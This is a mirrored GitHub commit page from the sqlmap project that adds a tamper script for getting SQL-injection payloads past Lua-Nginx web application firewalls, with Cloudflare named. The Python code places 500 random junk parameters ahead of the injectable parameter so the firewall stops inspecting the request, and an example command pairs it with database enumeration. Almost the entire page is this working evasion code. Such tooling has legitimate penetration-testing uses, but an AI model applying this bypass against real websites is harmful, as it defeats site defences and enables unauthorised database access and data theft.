mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-22 01:26:42 +03:00
Lua-Nginx WAFs Bypass (#3316)
* Lua-Nginx WAFs Bypass Lua-Nginx WAFs doesn't support processing for more than 100 parameters. https://www.youtube.com/watch?v=JUvro7cqidY * Update luanginxwafbypass.py * Update luanginxwafbypass.py * Update luanginxwafbypass.py * Update luanginxwafbypass.py Update header. * Update luanginxwafbypass.py
This commit is contained in:
parent
dc65afe65a
commit
4466504f30
51
tamper/luanginxwafbypass.py
Normal file
51
tamper/luanginxwafbypass.py
Normal file
|
@ -0,0 +1,51 @@
|
|||
#!/usr/bin/env python
|
||||
# -*- coding: utf-8 -*-
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
'''
|
||||
[+] LUA-Nginx WAFs Bypass (Cloudflare)
|
||||
Lua-Nginx WAFs doesn't support processing for more than 100 parameters.
|
||||
|
||||
Example: sqlmap -r file.txt --tamper=luanginxwafbypass.py --dbs --skip-urlencode -p vulnparameter
|
||||
Required options: --skip-urlencode, -p
|
||||
'''
|
||||
|
||||
import sys
|
||||
import string
|
||||
import random
|
||||
from lib.core.enums import PRIORITY
|
||||
from lib.core.data import conf
|
||||
__priority__ = PRIORITY.HIGHEST
|
||||
|
||||
''' Random parameter'''
|
||||
def randomParameterGenerator(size=6, chars=string.ascii_uppercase + string.digits):
|
||||
output = ''.join(random.choice(chars) for _ in range(size))
|
||||
return output
|
||||
|
||||
''' Tamper '''
|
||||
def tamper(payload, **kwargs):
|
||||
try:
|
||||
headers = kwargs.get("headers", {})
|
||||
randomParameter = randomParameterGenerator()
|
||||
parameter = conf["testParameter"][0]
|
||||
|
||||
if not parameter:
|
||||
print "\n[-] [ERROR] Add an injectable parameter with -p option (-p param)"
|
||||
sys.exit(0)
|
||||
|
||||
if conf["skipUrlEncode"] != True:
|
||||
print "\n[-] [ERROR] --skip-urlencode option must be activated"
|
||||
sys.exit(0)
|
||||
|
||||
# Add 500 parameters to payload
|
||||
luaBypass = ("&" + randomParameter + "=")*500 + "&"
|
||||
outputPayload = luaBypass + parameter + "=" + payload
|
||||
|
||||
return outputPayload
|
||||
except Exception as error:
|
||||
print error
|
||||
return None
|
Loading…
Reference in New Issue
Block a user